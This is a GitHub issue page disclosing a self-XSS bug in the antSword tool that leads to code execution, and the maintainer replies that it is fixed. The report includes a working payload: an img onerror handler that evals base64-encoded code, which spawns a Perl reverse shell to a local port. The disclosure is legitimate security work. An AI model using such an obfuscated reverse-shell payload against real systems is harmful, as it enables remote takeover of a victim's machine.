Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

antSword self-XSS Vulnerability leads to Code Execution #151

miaochiahao opened this issue Apr 18, 2019 · 1 comment


Copy link

commented Apr 18, 2019



屏幕快照 2019-04-18 下午6 32 40


localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">

屏幕快照 2019-04-18 下午6 33 28


屏幕快照 2019-04-18 下午6 35 07


屏幕快照 2019-04-18 下午6 35 46

self-xss也请修复一下 :D


This comment has been minimized.

Copy link

commented Apr 18, 2019

感谢反馈, 已修复

@miaochiahao miaochiahao changed the title antSword self-XSS Vulnerability leads to RCE antSword self-XSS Vulnerability leads to Code Execution Apr 18, 2019

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
2 participants
You can’t perform that action at this time.